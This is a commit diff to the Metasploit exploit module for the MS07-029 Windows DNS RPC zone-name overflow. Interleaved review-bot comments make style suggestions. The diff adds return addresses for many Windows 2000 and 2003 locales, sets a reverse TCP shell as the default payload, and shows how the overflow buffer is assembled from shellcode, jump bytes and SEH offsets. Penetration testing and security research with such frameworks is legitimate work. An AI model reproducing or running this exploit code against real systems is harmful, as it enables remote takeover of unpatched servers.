Land #15918, add more targets for ms07_029_msdns_zonename
This commit is contained in:
commit
abb11cf896
|
@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'hdm', # initial module
|
'hdm', # initial module
|
||||||
'Unknown' # 2 unknown contributors (2003 support)
|
'Unknown', # 2 unknown contributors (2003 support)
|
||||||
|
'bcoles' # additional target offsets
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -33,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread'
|
'EXITFUNC' => 'thread',
|
||||||
|
'PAYLOAD' => 'windows/shell/reverse_tcp'
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -48,12 +50,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
|
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
|
||||||
|
|
||||||
# WS2HELP.DLL
|
# p/p/r WS2HELP.DLL
|
||||||
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
||||||
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
|
||||||
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
|
||||||
|
|
||||||
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
||||||
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
||||||
|
@ -65,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2007-04-12',
|
'DisclosureDate' => '2007-04-12',
|
||||||
'DefaultTarget' => 0 ))
|
'DefaultTarget' => 0 ))
|
||||||
|
@ -138,8 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if (not mytarget)
|
if (not mytarget)
|
||||||
print_error("There is no available target for this locale")
|
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
|
||||||
return
|
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
mytarget = target
|
mytarget = target
|
||||||
|
@ -149,7 +161,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Connect to the high RPC port
|
# Connect to the high RPC port
|
||||||
connect(true, { 'RPORT' => dport })
|
connect(true, { 'RPORT' => dport })
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{mytarget.name}...")
|
||||||
|
|
||||||
# Bind to the service
|
# Bind to the service
|
||||||
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
handle = dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||||
|
@ -160,18 +172,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# Create our buffer with our shellcode first
|
# Create our buffer with our shellcode first
|
||||||
txt = Rex::Text.rand_text_alphanumeric(8192)
|
txt = Rex::Text.rand_text_alphanumeric(8192)
|
||||||
|
|
||||||
if (target['OS'] =~ /2000/)
|
if (mytarget['OS'] =~ /2000/)
|
||||||
txt[0, payload.encoded.length] = payload.encoded
|
txt[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
off = target['Off']
|
off = mytarget['Off']
|
||||||
txt[ off ] = [mytarget.ret].pack('V')
|
txt[ off ] = [mytarget.ret].pack('V')
|
||||||
txt[ off - 4, 2] = "\xeb\x06"
|
txt[ off - 4, 2] = "\xeb\x06"
|
||||||
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
|
||||||
|
|
||||||
elsif (target['OS'] =~ /2003SP0/)
|
elsif (mytarget['OS'] =~ /2003SP0/)
|
||||||
txt[0, payload.encoded.length] = payload.encoded
|
txt[0, payload.encoded.length] = payload.encoded
|
||||||
|
|
||||||
off = target['Off']
|
off = mytarget['Off']
|
||||||
txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
|
txt[ off ] = [mytarget['Rets'][0]].pack('V') # __except_handler3
|
||||||
txt[ off - 4, 2] = "\xeb\x16"
|
txt[ off - 4, 2] = "\xeb\x16"
|
||||||
|
|
||||||
|
|
|
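Review bot: `if (not mytarget)` in the hunk at -138 keeps the `not` keyword and redundant parentheses around a one-term condition even though the commit rewrites the body of that branch; the idiomatic guard is a modifier, `fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale") unless mytarget`, which also drops the now-empty `end`. The same `if (not target)` form appears in the second file's -124 hunk. Separately, the target-table comment changed to `# p/p/r WS2HELP.DLL` is terse for a reader who does not know the abbreviation; spelling it out, `# pop/pop/ret in WS2HELP.DLL` (presumably what p/p/r stands for here), says the same thing without the shorthand. The enclosing method, including the `else` branch that assigns `mytarget = target`, continues outside the hunk.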
@ -25,7 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'hdm', # initial module
|
'hdm', # initial module
|
||||||
'Unknown' # 2 unknown contributors (2003 support)
|
'Unknown', # 2 unknown contributors (2003 support)
|
||||||
|
'bcoles' # additional target offsets
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -37,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread'
|
'EXITFUNC' => 'thread',
|
||||||
|
'PAYLOAD' => 'windows/shell/reverse_tcp'
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -52,25 +54,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)', { } ],
|
[ 'Automatic (2000 SP0-SP4, 2003 SP0-SP2)', { } ],
|
||||||
|
|
||||||
# WS2HELP.DLL
|
# p/p/r WS2HELP.DLL
|
||||||
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ English', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
|
||||||
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
|
||||||
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
[ 'Windows 2000 Server SP0-SP4+ French', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ German', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Italian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Polish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Portuguese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Korean', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74f92ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Russian', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fb2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Simplified Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Spanish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Swedish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Traditional Chinese', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fa2ac4 } ],
|
||||||
|
[ 'Windows 2000 Server SP0-SP4+ Turkish', { 'OS' => '2000', 'Off' => 1213, 'Ret' => 0x74fc2ac4 } ],
|
||||||
|
|
||||||
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
# Use the __except_handler3 method (and jmp esp in ATL.dll)
|
||||||
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
[ 'Windows 2003 Server SP0 English', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f45a34, 0x77f7e7f0, 0x76a935bf] } ],
|
||||||
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
|
[ 'Windows 2003 Server SP0 French', { 'OS' => '2003SP0', 'Off' => 1593, 'Rets' => [0x77f35a34, 0x77f6e7f0, 0x76a435bf] } ],
|
||||||
|
|
||||||
|
|
||||||
# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
|
# ATL.DLL (bypass DEP/NX, IB -> Image Base of ATL.dll)
|
||||||
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
|
[ 'Windows 2003 Server SP1-SP2 English', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a80000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
[ 'Windows 2003 Server SP1-SP2 French', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Spanish', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76a30000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 Italian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
[ 'Windows 2003 Server SP1-SP2 German', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x76970000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Russian', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769a0000 } ],
|
||||||
|
[ 'Windows 2003 Server SP1-SP2 Simplified Chinese', { 'OS' => '2003SP12', 'Off' => 1633, 'IB' => 0x769c0000 } ],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2007-04-12',
|
'DisclosureDate' => '2007-04-12',
|
||||||
'DefaultTarget' => 0 ))
|
'DefaultTarget' => 0 ))
|
||||||
|
@ -124,14 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
print_status("Detected a Windows 2003 SP#{$2} target...")
|
print_status("Detected a Windows 2003 SP#{$2} target...")
|
||||||
target = gettarget('2003SP12')
|
target = gettarget('2003SP12')
|
||||||
else
|
else
|
||||||
print_status("Unknown OS: #{smb_peer_os}")
|
fail_with(Failure::NoTarget, "No target for OS: #{smb_peer_os}")
|
||||||
return
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
if (not target)
|
if (not target)
|
||||||
print_status("There is no available target for this OS locale")
|
fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale")
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
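Review bot: The hunk at -124 still stores the chosen target in a local named `target` (`target = gettarget('2003SP12')`, `if (not target)`), which looks like a local shadowing the exploit's `target` accessor for the rest of the method, whereas the sibling module in this same commit was corrected to use `mytarget` throughout; renaming the local to `mytarget` here would remove that ambiguity and keep the two files consistent. The guard can then be a modifier, `fail_with(Failure::NoTarget, "There is no available target for '#{datastore['LOCALE']}' locale") unless mytarget`. Since `gettarget` appears to return nil for an unsupported locale (its body is outside the hunk), a one-line comment above that check such as `# gettarget returns nil when the locale has no entry, so check again after OS detection` would record why the second check remains now that the unknown-OS arm raises via `fail_with`. The enclosing detection block starts outside the hunk.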